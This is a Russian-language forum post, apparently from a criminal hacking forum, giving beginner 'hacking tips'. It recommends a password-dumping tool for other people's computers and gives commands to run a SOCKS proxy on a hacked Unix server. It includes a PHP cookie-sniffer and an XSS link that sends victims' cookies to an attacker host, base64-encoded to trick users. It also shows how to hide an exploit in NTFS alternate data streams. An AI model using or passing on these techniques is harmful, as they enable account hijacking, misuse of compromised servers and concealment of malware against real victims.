• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

Это должен знать каждЫй Ламер

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Это должен знать каждЫй Ламер.

Если тЫ чайник, то тЫ по адресу, ща будем делать из тебя ламера :)
Добовляйте свои советЫ, а я буду обновлять список.
  1. [urli="http://www.webcriminal.ru/forum/showthread.php?t=125#pass"] ЗабЫл пароль от ICQ, TheBat! и тп.[/urli]
  2. [urli="http://www.webcriminal.ru/forum/showthread.php?t=125#socks"] Поднимаем собственнЫй socks, имея вналичии взломаннЫй *nix-сервер.[/urli]
  3. [urli="http://www.webcriminal.ru/forum/showthread.php?t=125#xxs"] Уводим чужой аккаунт на web-сайте через XSS-баг.[/urli]
  4. [urli="http://www.webcriminal.ru/forum/showthread.php?t=125#sploit"] Прячем в чужой Винде сплоит, чтобЫ его невозможно бЫло найти даже при включенной опции «Отображать скрЫтые файлы и папки».[/urli]
  5. [urli="http://www.webcriminal.ru/forum/showthread.php?t=125#password"]Список паролей по умолчанию.[/urli]

[aname="pass"] 1.[/aname] Если тЫ забЫл пароль от ICQ, TheBat! и тп, то тебе в помощь PassView (для локальщиков, остальнЫе идуд в гугл)
Спомощью этой проги тЫ сможешь:
Увидеть пароли на своем или не совсем своем компе ;)

Она показЫвает:
----------------------------------------------------
<- Пароли от Ras (диалап) Win9x/Me/2k/Xp/2k3 - beta - tested Win98Se, 2k, Xp
<- Пароли которЫй кеширует Win9x/Me - beta
<- Пароли от шаров (Win9x/Me/2k/XP/2k3) - beta
<- Пароли от Internet Explorer (Автодополнение и ЗащищеннЫе сайтЫ) - beta - tested v6.0
<- Пароли от Icq (ver: 99,2000,2001,2002,2003,Lite) - tested v2k, 2k2, Lite - stable
<- Пароли от Trillian'a - stable - tested v0.61, 0.70, 1.0 Pro, 2.0 Pro
<- Пароли от Miranda - beta - tested v1.2.1, 2.0
<- Пароли от &RQ - stable - tested v9.9.4.16
<- Пароли от Odigo - beta - tested v4.0.689
<- Пароли от Far - stable - tested v1.7b2, 1.7b5
<- Пароли от PC Remote - beta - tested v1.0
<- Пароли от E-Type Dialer'a - stable - tested v1.42
<- Пароли от Becky! Mail - beta - tested v2.06.02
<- Пароли от OutLook - beta - tested v5.0e, 6.0e
<- Пароли от The Bat! - beta - tested v1.60, 1.62
<- Пароли от Total Commander (Windows Commander) - beta - tested v4.0, 5.50, 5.51
<- Пароли от AOL Instant Messenger - beta - not tested
<- Пароли от MSN - beta - not tested
<- Пароли от YsmIcq - beta - tested v7.2.9.0
<- Пароль от заставки Windows (Win9x/Me) - stable - tested Win98Se
<- ОткрЫтие паролей из под звездочек - stable
<- Экспорт паролей в файл, для дальнейшего изучения ;) (Ras, Cache, IE, Icq,
Miranda, &RQ, Odigo, E-Dialer, Far, The Bat!, Becky!, Total Commander,
ScreenSaver, AIM, MSN - beta
<- Импорт паролей из файла: Catax, E-Dialer, FlashFXP, Icq - beta
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
С сегодняшнего дня буду добавлять советЫ с журнала ][akep рубрика Easy Hack

[ANAME="socks"]Поднимаем собственнЫй socks[/ANAME], имея вналичии взломаннЫй *nix-сервер.
1. Задача вполне решаема, поэтому при соответствующей подготовке реализация задуманного займет не более 10-15 минут. Поднимать носок будем на базе боунсера (Bouncer Socks-Server), поскольку это наиболее удобный, стабильный и простой в настройке вариант. Выбираем поломанный *nix-сервер из заначки и коннектимся к шеллу.
2. Сливаем Bouncer на ломанный сервер командой:
Код:
$ wget http://www.securitylab.ru/_tools/bouncer-1.0.rc6‑linux-intel.tar.gz -O /tmp/bouncer.tar.gz
2а. Если на выбранной тобой машине крутится FreeBSD, следует загрузить другой файл:
Код:
$ wget http://www.securitylab.ru/_tools/bouncer-1.0.rc6‑freebsd-intel.tar.gz -O /tmp/bouncer.tar.gz
3. После разархивации в /tmp запускаем socks:
Код:
$ /tmp/bouncer
4. В ответ socks-сервер вывалит тебе список всех опций. Рассмотрим несколько наиболее важных, обеспечивающих выполнение поставленной перед нами задачи (поднятие носка). Удобнее всего использовать socks5: во-первых, этот протокол держит авторизацию, а во-вторых, с ним работает множество утил (в том числе и известная тебе FreeCap). Таким образом, нам понадобятся следующие параметры: ‘--socks5’ — выбор протокола socks5, ‘--port’ — указание порта, ‘--s_user’ — имя пользователя, ‘--s_password’ — пароль пользователя и ‘--daemon’, который позволит нашему носку работать в режиме демона. Запускаем:
Код:
$ /tmp/bouncer --socks5 --port 12345 --s_user admin --s_password pass --daemon
5. Вот и все :). Socks-сервер запущен на порту 12345 с аккаунтом вида admin:pass.

P.S. Кстати, аналогичное можно проделать и под Виндой с Win32‑версией боунсера, которую следует забрать отсюда:

http://securitylab.ru/_tools/bouncer-1.0.rc6‑win32.zip

Все параметры запуска абсолютно те же, что и в *nix-варианте, только вбивать их нужно в cmd.exe.
[ANAME="xss"] Уводим чужой аккаунт на[/ANAME] web-сайте через XSS-баг.
XSS (не что иное, как Cross Site Scripting) представляет собой тип уязвимостей, в ходе эксплуатации которых возможно выполнение произвольного JavaScript-кода. Его исполнение может осуществляться с целью хищения админских куков и последующего получения контроля над атакуемым ресурсом. Рассмотрим повседневный пример. Для решения задачи представим, что у нас есть дырявый двиг на сайте www.target.com, который содержит в себе XSS-баг по адресу www.target.com/error.php?message=<script>наш_код</script>.
1. Пишем PHP-снифер, который получит отправленные данные пользователя с уязвимого ресурса. Пример:
Код:
< ? пхп
if(isset($QUERY_STRING)) {
$date= date('d.m.y : H:i:s');
mail("your_email@mail.ru", "Cookies", " Date and Time:
$date\n IP: $REMOTE_ADDR\n Adress: $HTTP_REFERER\n
Cookie: $QUERY_STRING\n ASS: $HTTP_ACCEPT\n Agent:
$HTTP_USER_AGENT\n Host: $HTTP_HOST\n Server:
$SERVER_PORT\n script: $SCRIPT_NAME\n method:
$REQUEST_METHOD\n bite: $CONTENT_LENGRH\n root:
$DOCUMENT_ROOT");
}
? >
Вместо your_email@mail.ru указывается реальный мыльник, на который будут стекаться конфиденциальные данные :).
2. Заливаем написанный снифер на любой из своих веб-шеллов (главное, чтобы на сервере стоял PHP). В крайнем случае можно заюзатькакой-либо бесплатный хостинг с поддержкой PHP. Аплоадить скрипт необходимо в веб-директорию. Например, сюда: http://www.hacker.com/snif.php.
3. Составляем «ядовитый» линк, который мы и будем пихать жертве:
Код:
http://www.target.com/error.php?message=<script>document.location=’http://www.hacker.com/snif.php?’+document.cookie</script>
4. Получившаяся ссылочка выглядит некрасиво и неаппетитно. А нам нужно, чтобы юзер непременно проглотил наживку. Поэтому кодируем наш JavaScript-код алгоритмом base64:
Код:
http://www.target.com/error.php?message=PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlvbj0naHR0cDovL3d3dy5oYWNrZXIuY29tL3NuaWYucGhwPycrZG9jdW1lbnQuY29va2llPC9zY3JpcHQ+
5. Далее все зависит от твоих способностей в сфере социнженерии и умения впихивать линки незнакомым людям :). После того как юзер/админ пройдет по ссылке, его куки тут же отправятся на наш снифер, а тот, в свою очередь, любезно скинет их тебе на мыло:).
[ANAME="sploit"]Прячем в чужой Винде сплоит[/ANAME], чтобЫ его невозможно бЫло найти даже при включенной опции «Отображать скрЫтые файлы и папки».
1. Мы собираемся скрыть наши файлы на локальном (а имея доступ к shell, и на удаленном) компьютере под управлением Windows, используя особенность представления файлов в NTFS. Дело в том, что любой файл в файловой системе NTFS — это совокупность потоков данных, и то, что привычно видеть обычному пользователю в окошке Explorer’a, — лишь один из потоков данных, составляющих файл, пусть даже и основной. Информацию о других потоках стандартными средствами Винды получить нельзя. Добавление нового потока не изменяет размер файла, не изменяется и контрольная сумма файла. Имя файла и имя потока, принадлежащего этому файлу, разделяются двоеточием: «файл:поток».
2. Добавим наш сплоит shaded в поток stream1 файла target.dll. Для этого в командной строке наберем:
Код:
type shaded >> target.dll:stream1
Здесь команда type выведет содержимое файла shaded, но вывод будет перенаправлен (>>) в нужный нам поток.
3. Стандартными средствами системы проверить результат не удастся, поэтому можно воспользоваться одной из freeware-программ для обнаружения альтернативных потоков данных, таких как streams от Марка Руссиновича (www.sysinternals.com) или lads от Frank Heyne Software (www.heysoft.de).
4. В результате для файла target.dll имеем поток stream1, по размеру равный скрываемому сплоиту shaded, однако размер файла target.dll не изменился. Для того чтобы просмотреть информацию, находящуюся в потоке, наберем:
Код:
more < target.dll:stream1
6. Итак, мы скрыли наш сплоит, скопировав его содержимое в поток. Но рано или поздно его нужно будет оттуда достать. Это можно сделать командой:
Код:
more < target.dll:stream1 >> spl
Здесь «more <» выводит в консоль содержимое потока stream1, а команда «>>» перенаправляет вывод в файл spl.
 
Сверху